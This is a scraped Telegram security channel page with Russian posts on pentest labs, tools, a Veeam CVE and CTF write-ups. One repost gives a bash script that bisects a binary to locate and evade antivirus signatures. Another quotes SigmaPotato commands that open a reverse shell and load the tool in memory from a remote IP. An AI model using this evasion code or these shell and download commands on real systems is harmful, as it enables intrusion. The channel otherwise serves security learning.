Fsecurity | HH
前往频道在 Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
显示更多2 064
订阅者
+224 小时
-17 天
-530 天
帖子存档
2 063
Repost from PurpleBear
Меня иногда просят посоветовать self-hosted лабы по различным доменам знаний деятельности пентестеров для наработки и совершенствования навыков на практике, поэтому ловите небольшую подборку:
☑️ Kubernetes Goat - Vulnerable by design Kubernetes cluster
☑️ GOAD - Game of Active Directory
☑️ DVWA - Damn Vulnerable Web Application
☑️ DVWS - Damn Vulnerable Web Sockets
☑️ DVHMA - Damn Vulnerable Hybrid Mobile App (Android)
☑️ DVIA - Damn Vulnerable iOS App
☑️ DVIA2 - Damn Vulnerable iOS App v2
☑️ CI/CD Goat - Vulnerable CI/CD environment
☑️ DVGA - Damn Vulnerable GraphQL Application
☑️ VAmPI - Vulnerable REST API
☑️ DVSA - Damn Vulnerable Serverless Application
☑️ DVFaaS - Damn Vulnerable Functions as a Service (AWS Lambda)
☑️ AWS Goat - Damn Vulnerable AWS Infrastructure
☑️ DVCA - Damn Vulnerable Cloud Application (AWS privesc)
☑️ Azure Goat - Damn Vulnerable Azure Infrastructure
☑️ GCP Goat - Damn Vulnerable GCP Infrastructure
☑️ DVTA - Damn Vulnerable Thick Client App
☑️ DVJA - Damn Vulnerable Java (EE) Application
☑️ DVID - Damn Vulnerable IoT Device
☑️ DVAS - Damn Vulnerable Application Scanner
☑️ DVB - Damn Vulnerable Bank
☑️ DVWPS - Damn Vulnerable WordPress Site
☑️ DVNA - Damn Vulnerable NodeJS Application
☑️ DVGM - Damn Vulnerable Grade Management
☑️ Tiredful API - REST API intentionally designed broken App
☑️ DVCSharp - Damn Vulnerable C# Application (API)
☑️ DVRF - Damn Vulnerable Router Firmware
☑️ DVLLMP - Damn Vulnerable LLM Project
☑️ DVLLMA - Damn Vulnerable LLM Agent
Безусловно некоторые из них уже устарели и содержат не самые актуальные баги, а с некоторыми придется повозиться чтобы установить и развернуть, но все же это хорошая отправная точка для погружения в интересующую тематику😎
2 063
Repost from s0i37_channel
Дихотомия vs сигнатуры антивируса.
Крошечный скрипт в 30 строчек, что используя бинарный поиск перезаписывает разные участки программы, а за тем грузит и запускает на тестовой системе. Так иногда можно найти точное расположение палевного участка и точечно обойти AV.
Все что нужно это виртуалка с подопытным антивирусом и конечно же время.
#!/bin/bash
bin="$1"
[[ $# -ge 2 ]] && o="$2" || o=0
bytes=$(wc -c $bin | cut -d ' ' -f 1)
test="/tmp/$(basename $bin)"
function test_av(){
HOST='10.0.0.10'; CREDS='admin:password'; RUN="c:\\$(basename $1) help exit"; OUTPUT='coffee'
{ echo 'use c$'; echo "put $1"; } | smbclient.py "$CREDS@$HOST" > /dev/null
{ echo "$RUN"; echo 'exit'; } | smbexec.py -codec 866 "$CREDS@$HOST" | grep -q "$OUTPUT"
#{ echo '{"execute": "qmp_capabilities"}'; echo '{"execute": "human-monitor-command", "arguments": {"command-line": "loadvm ready"}}' } | nc 127.0.0.1 4444 # qemu -hda av.qcow2 -qmp tcp:127.0.0.1:4444,server,nowait
return $?
}
next=("0 $[bytes/2]" "$[bytes/2] $[bytes/2]")
n=0
while [ $n -lt ${#next[@]} ] ; do
read offset len <<< $(echo ${next[$n]})
[[ $n -lt $o ]] && { next+=("$[offset] $[len/2]"); next+=("$[offset+len/2] $[len/2]"); ((n++)); continue; }
cp "$bin" "$test"
dd if=/dev/zero of="$test" bs=1 count=$len seek=$offset conv=notrunc 2> /dev/null
echo -ne "[*] test $bin: $offset $len (queue: $n/${#next[@]})\r"
if test_av "$test"; then
echo -e "\n[+] $offset $len"
radiff2 -x "$bin" "$test" | head
else
next+=("$[offset] $[len/2]")
next+=("$[offset+len/2] $[len/2]")
fi
((n++))
done
Вполне может подружить не сильно страшный бинарь с не сильно страшным антивирусом.2 063
Repost from APT
🖥 Veeam Enterprise Manager Authentication Bypass
May 21st, Veeam published an advisory stating that all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 is affected by an authentication bypass allowing an unauthenticated attacker to bypass the authentication and log in to the Veeam Backup Enterprise Manager web interface as any user. , the CVSS for this vulnerability is 9.8.
🔗 Source:
https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
🔗 PoC:
https://github.com/sinsinology/CVE-2024-29849
#veeam #authentication #bypass #cve
2 063
Repost from Pentest HaT
🏃 SigmaPotato 1.2.6
Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato)
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege
Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.
whoami /priv
Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a
Примеры:
./SigmaPotato.exe --revshell ip port
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))
[SigmaPotato]::Main(@("--revshell","ip","port"))
Windows 8/8.1 - Windows 11 Windows Server 2012 - Windows 2022💻 Home 💻 Download #potato #lpe #windows #soft #sigmapotato ✈️ // Pentest HaT 🎩
2 063
open-appsec - это механизм безопасности машинного обучения, который превентивно и автоматически предотвращает угрозы для веб-приложений и API. Это репозиторий включает основной код и логику.
🔗Ссылка:
https://github.com/openappsec/openappsec
2 063
HTB Sherlock: Constellation
🔗Ссылка:
https://0xdf.gitlab.io/2024/06/05/htb-sherlock-constellation.html
2 063
GoldenEye — это инструмент тестирования DoS-атак HTTP. Этот инструмент можно использовать для проверки уязвимости сайта к атакам типа «отказ в обслуживании» (DoS). Можно открыть несколько параллельных подключений к URL-адресу, чтобы проверить, может ли веб-сервер быть скомпрометирован.Установка:
sudo apt install goldeneye🔗Ссылка: https://www.kali.org/tools/goldeneye/
2 063
Snort - это анализатор / регистратор пакетов на базе libpcap, который можно использовать в качестве облегченной системы обнаружения сетевых вторжений. Он поддерживает ведение журнала на основе правил и может выполнять поиск / сопоставление содержимого в дополнение к обнаружению множества других атак и зондов, таких как переполнение буфера, скрытое сканирование портов, CGI-атаки, SMB-зонды и многое другое. Snort обладает возможностью оповещения в режиме реального времени, при этом оповещения отправляются в системный журнал, отдельный файл “alert” или даже на компьютер с Windows через Samba.
🔗Ссылка:
https://www.kali.org/tools/snort/
2 063
Repost from TaipanByte CTF
Всем привет! 😎
Мы добавили несколько райтапов на таски Codeby.games:
🗂Архиватор
#web #easy
🔐Доступ запрещен
#web #medium
💸Базовая авторизация 2
#web #medium
🦖Мистер Дино
#web #easy
🍯Ханипот
#web #easy
👩👩👦Семья
#crypto #easy
㊙️Руны, руны, и ещё раз руны
#crypto #medium
🪆Матрешка
#forensic #easy
#codeby #writeup
2 063
Sickle - это инструмент для разработки полезной нагрузки, изначально созданный для помощи в создании шеллкода, однако его можно использовать и для создания полезной нагрузки для других типов эксплойтов (недвоичных). Хотя текущие модули в основном предназначены для сборки, этот инструмент не ограничивается шеллкодом.
🔗Ссылка:
https://www.kali.org/tools/sickle-tool/
2 063
Хочу также посоветовать:
1 - Наш discord сервер! Где можно пообщаться 👾
2 - Мой Github 🦑
Наш второй канал [Ximera-Chan]
